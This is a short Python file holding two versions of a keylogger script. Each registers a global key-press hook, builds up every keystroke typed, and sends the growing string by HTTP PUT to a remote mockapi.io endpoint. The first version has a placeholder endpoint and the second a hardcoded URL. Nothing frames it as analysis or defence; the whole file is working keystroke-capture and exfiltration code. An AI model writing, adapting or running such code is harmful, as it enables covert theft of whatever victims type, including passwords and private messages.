import keyboard
import requests

endpoint = '#ADD MOCKAPI ENDPOINT'
data = requests.get(endpoint + "/1").json()

def on_key_press(event):
    if event.name == "space":
        data["name"] = data["name"] + " "
    else:
        data["name"] = data["name"] + event.name
    myobj = {'name': data["name"]}
    requests.put(endpoint + "/1", json = myobj)

keyboard.on_press(on_key_press)

keyboard.wait()


import keyboard
import sys
import requests

try:
    endpoint = 'https://66d0744e181d059277deaa20.mockapi.io/h'
    data = requests.get(f"{endpoint}/1").json()

except requests.RequestException as e:
    print(e); sys.exit(1)

def on_key_press(event):
    data["char"] += " " if event.name == "space" else event.name
    requests.put(f"{endpoint}/1", json={'char': data["char"]})

keyboard.on_press(on_key_press)
keyboard.wait()
